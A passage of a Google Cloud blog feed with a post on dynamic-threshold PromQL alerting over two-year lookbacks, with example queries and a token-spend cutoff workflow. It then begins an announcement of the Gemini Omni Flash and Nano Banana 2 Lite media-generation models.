        &lt;img alt="qtfse9nqWC88b92" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/qtfse9nqWC88b92.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Clearly something went wrong in the middle of that chart… but because the anomalous value is within the normal range of the daily data, no static value threshold can ever catch it.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Introducing long lookbacks and dynamic thresholding&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are pleased to announce that this problem is now solvable for users of &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/monitoring/alerts"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Monitoring alerts&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with the launch of &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/monitoring/alerts/using-promql#promql-2years"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;long-lookback alert policies for PromQL&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, currently in preview. This highly requested feature update now lets you configure PromQL alert policies to run over two years of metric data stored in Cloud Monitoring, supporting year-over-year and quarter-over-quarter analysis. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;One major use case unlocked by two-year lookback horizons in PromQL is dynamic thresholding, that is, policies where the threshold refers to the metric’s history. A simple example is an alert policy that says “alert me if the average over the last 5 minutes is 2x more than the average over the last week.” Instead of setting a static number as your threshold, you set how anomalous each time series must be from its historical data before generating an alert. This allows flexibility in policies, supports naturally changing baselines caused by growth in workloads, and provides a single threshold that works for all workloads. You don’t have to analyze every time series to set alerts properly – just set a factor that signals “anomalous” to you.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Take the above example: To catch that anomaly, you might create a policy that says “alert me if the value over the last 5 minutes is lower than 70% of the value from the same 5-minute span one week ago.” Such a policy would create a threshold that varies by the time of day, and you would catch the anomalous drop:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="8JX8WREHZPq68Fc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/8JX8WREHZPq68Fc.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Dynamic threshold algorithms&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Choosing the right dynamic threshold algorithm in PromQL depends on the shape of your source data. Metrics that vary by time of day need a different algorithm than metrics that have little variation. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can rewrite the below examples to have the historical data query as your threshold (putting a metric after the &amp;lt; or &amp;gt;), but if you do so you can’t easily visualize the threshold.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Because these use historical data, granular alert policies that trigger on individual workloads instead of aggregates might be flaky when spinning up new workloads. This issue will resolve itself as you accrue historical data. You can also avoid this by only running dynamic threshold alerts on aggregates.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Moving averages&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; the simplest of the algorithms, alerts trigger when the recent trend of the data deviates from a moving average of data over a long period of time. This is good for catching anomalies in relatively stable data. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here’s some example PromQL, comparing the last 5 minutes to a one-week baseline and alerting if it’s 30% higher or lower than average:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;sum(rate(http_requests_total[5m])) /\r\nsum(rate(http_requests_total[1w]))\r\n &amp;gt; 1.3\r\nOR\r\nsum(rate(http_requests_total[5m])) /\r\nsum(rate(http_requests_total[1w]))\r\n &amp;lt; .7&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f21655ccdf0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="4v9HQ8snDJbP2oR" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/4v9HQ8snDJbP2oR.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can also write this as a direct comparison, which might be more understandable. The following says “alert me if the most recent 5 minutes average of data is &amp;gt;1.3x the weekly average.”:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;sum(rate(http_requests_total[5m])) &amp;gt; 1.3 * sum(rate(http_requests_total[1w]))&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f216545df40&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Z-score (standard deviation)&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Use this algorithm to identify anomalies based on the average and standard deviation of your data. A &lt;/span&gt;&lt;a href="https://en.wikipedia.org/wiki/Standard_score" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;z-score&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; measures the statistical distance between your recent data and historical data, with a common threshold being that a z-score above three or below negative three is considered anomalous. This measures the volatility of your data compared to its usual noisiness, and it works best with data that has a stable average and decent volatility:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Example PromQL, comparing the last 5 minutes to the one-week average and standard deviation:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;abs(\r\nsum(rate(http_requests_total[5m]))\r\n-\r\nsum(rate(http_requests_total[1w]))\r\n)\r\n/\r\nstddev_over_time(sum(rate(http_requests_total[5m]))[1w:5m])\r\n&amp;gt; 3&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f216545d4c0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Example z-score signal and the resulting anomaly detection threshold:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_VFrHPBv.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Seasonal decomposition (time offset comparison)&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;This is a simple time-offset algorithm that compares time-series data in a period of time to the same period from the previous day or week. This is ideal for metrics that have timely patterns associated with them, such as visitors to a website that vary by time of day and day of week. Holidays and other factors that might cause a given day to be lower than expected can be smoothed away by averaging more than one historical period (e.g., average one week ago, two weeks ago, and three weeks ago, then compare that average to today).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Example PromQL, comparing the last 5 minutes to the same time period yesterday, alerting if the recent data is more than 50% lower than the one-day offset data:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;sum(rate(http_requests_total[5m])) /\r\n   sum(rate(http_requests_total[5m] offset 1d))\r\n &amp;lt; .5&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f216545db80&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Which can be algebraically rewritten to: &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;sum(rate(http_requests_total[5m])) &amp;lt; .5 * sum(rate(http_requests_total[5m] offset 1d))&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f216545d9a0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Bkby4f9LySHuz75" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Bkby4f9LySHuz75.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In production, you might want to compare to the same period one week ago, or compare to an average of the same period one and seven days ago, to avoid triggering on naturally lower days such as weekends and holidays:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;sum(rate(http_requests_total[5m])) /\r\n   ((\r\n    sum(rate(http_requests_total[5m] offset 1d)) + sum(rate(http_requests_total[5m] offset 7d)) \r\n   ) / 2)\r\n &amp;lt; .5&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f216545d070&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When using time offsets, you can only reliably trigger on either drops or spikes, as triggering on both sudden drops and sudden spikes in a single policy may cause your alerts to fire twice.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Think of it this way: If traffic drops steeply today, your alert will trigger immediately. However, exactly 24 hours later, today's anomalous drop becomes tomorrow's historical baseline. If your policy triggers on any anomalous difference (higher or lower), the sudden "return to normal" tomorrow will look like a massive spike relative to yesterday's dip, and you will get a false alert for a phantom anomaly. You can see this in the above chart — the dip in the signal (blue line) reappears as its reciprocal exactly 24 hours later.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To prevent this, you should only track either drops or spikes when monitoring any given metric.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Control runaway costs using dynamic thresholds&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once you can trigger an alert based on deviations from a historical baseline, many interesting use cases open up. For example, you can use dynamic thresholding to prevent overspend for any Google Cloud service that offers a metric that roughly tracks spend.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Say you are concerned about runaway AI token costs. You could do the following:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Configure a dynamic threshold alert that triggers if the most recent 10 minutes of accumulated input/output token usage is more than 25x the one-week historical average, which should only catch extreme anomalous scenarios (such as leaked API keys) that will definitely result in overspend:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;sum(rate({"__name__"="aiplatform.googleapis.com/publisher/online_serving/&lt;br /&gt;token_count"}[10m])) &amp;gt; &lt;br /&gt;&lt;/code&gt;&lt;code style="vertical-align: baseline;"&gt;25 * sum(rate({"__name__"="aiplatform.googleapis.com/publisher/online_serving/&lt;br /&gt;token_count"}[1w]))&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Trigger your alert to fire to a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/monitoring/support/notification-options#pubsub"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Pub/Sub notification channel&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that pushes notifications to a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/run/docs/functions/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Run function&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;That Cloud Run function then runs a workflow that uses the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/docs/quotas/api-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Quotas API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to lower your Token Usage quota to 0, which immediately stops the overspend. Note that legitimate use of tokens will be paused until you can fix the problem… but at least you’ll stop the bleeding.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Sign up to be a design partner&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are working on productizing anomaly detection using dynamic thresholds so they’re easier to write. We’re also working on more complex anomaly detection algorithms in Cloud Monitoring alerting that uses AI models specifically trained on time-series data.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you’re interested in sharing your thoughts and being an early adopter of what we’re building in this space, &lt;/span&gt;&lt;a href="https://docs.google.com/forms/d/e/1FAIpQLScb6eWg79EBIMYvb4wk38x0xj7_HLdGbDSDUsruAqk9qlFXVA/viewform?usp=publish-editor" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;sign up to be a preview partner&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. We’d love to have you!&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/management-tools/cloud-monitoring-adds-long-lookback-alert-policies-for-promql" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-30T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/ai-machine-learning/nano-banana-2-lite-and-gemini-omni-flash-available</id>
    <title>Bringing speed and strong cost performance to the market with Gemini Omni Flash and Nano Banana 2 Lite</title>
    <updated>2026-06-30T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Great creative happens when your tools move at the speed of your ideas. To help you create rich, reliable experiences while reducing regeneration time and costs, we’re adding two new models to &lt;/span&gt;&lt;a href="https://console.cloud.google.com/agent-platform/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;First, we’re announcing the general availability of &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/models/gemini/3-1-flash-lite-image"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Nano Banana 2 Lite (Gemini 3.1 Flash-Lite Image)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This model is the fastest and most cost-efficient image generation and editing model within the &lt;/span&gt;&lt;a href="https://deepmind.google/models/gemini-image/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Nano Banana model family&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Whether you're rapid-firing ideas, A/B testing ad variations, or powering social apps for millions of users, this model gives you the power to explore, iterate, and scale with speed.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We’re also releasing &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/models/gemini/omni-flash-preview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Omni Flash&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in public preview. Grounded in Gemini's real-world knowledge, it powers high-quality video generation and conversational editing. Whether you're executing character or product swaps, performing dynamic style transfers, or adding objects and relighting scenes, this model gives you precise control to edit and refine video assets.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=luecG7F6s2k"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Gemini Omni Flash and Nano Banana&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
      &lt;figcaption class="article-video__caption h-c-page"&gt;
        
          &lt;h4 class="h-c-headline h-c-headline--four h-u-font-weight-medium h-u-mt-std"&gt;Bring your boldest vision to life with Gemini Omni Flash and Nano Banana.&lt;/h4&gt;
        
        
      &lt;/figcaption&gt;
    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=luecG7F6s2k"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Both models provide some of the best price-performance among market-leading frontier models for image and video generation and editing.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Gemini Omni Flash: High-quality video generation and editing&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Gemini Omni Flash brings conversational video generation and editing directly into your applications. Users can easily embed powerful media models into their agentic workflows to create, remix, and refine video without ever switching platforms.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Video Editing  - Descending - Chart@2x" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Video_Editing__-_Descending_-_Chart2x.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;For comprehensive benchmarking information from Google DeepMind, please visit &lt;a href="https://deepmind.google/models/gemini-omni/#:~:text=Gemini%20Omni%20Flash%20delivers%20exceptional%20results%20in%20Video%20Editing%2C%20Text%20to%20Video%2C%20Image%20to%20Video%2C%20and%20Reference%20to%20Video."&gt;Gemini Omni.&lt;/a&gt;&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We built Gemini Omni Flash with a focus across these four key areas:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Conversational editing:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Swap characters, relight scenes, or alter angles using natural language while natively maintaining original audio and video tracks.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Multimodal input:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Combine text, images, and video inputs to guide video generation. Gemini Omni Flash natively generates audio with every video output, while maintaining character, object, and style consistency. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;World knowledge and simulation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; It combines an intuitive understanding of physics with Gemini's knowledge of history, science and cultural context, bridging the gap from photorealism to meaningful storytelling.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Text and action synchronization: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Render legible text and graphics directly into video, syncing kinetic typography and explainer text with on-screen movements.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Note: Support for audio references, video references, last frame, scene extension and higher resolutions for the Gemini Omni Flash via Gemini Enterprise Agent Platform API will be available soon.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To see the full list of model capabilities and how to integrate it check out the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/models/gemini/omni-flash-preview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise-agent-platform/generative-ai/pricing"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;pricing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="gemini-omni-flash-1.1-table_price@2x" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/gemini-omni-flash-1.1-table_price2x.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Priced at $0.10 per second of video output, Gemini Omni Flash delivers some of the best price-performance for video generation and editing capabilities on the market.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Businesses using Gemini Omni Flash to build next-gen applications and creative agentic workflows:&lt;/span&gt;&lt;/h3&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Gemini Omni Flash Customer logo" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Gemini_Omni_Flash_Customer_logo.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="adobe wrapped" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/adobe_wrapped.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;&lt;i&gt;“We’re excited to bring Google’s newest models, including Gemini Omni Flash and Nano Banana 2 Lite, to Adobe Firefly, our all-in-one creative AI studio – to help creators move faster from idea to finished content. These new models build on Adobe’s strategy to deliver our pro-grade tools and the industry’s top creative AI models in a connected workflow, giving creators flexibility and control over how they bring their creative ideas to life."&lt;/i&gt; – Matt Chotin, Senior Director of Product, Adobe&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=TMBjp8-Uugc"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Gemini Omni Flash in Adobe Firefly&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=TMBjp8-Uugc"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
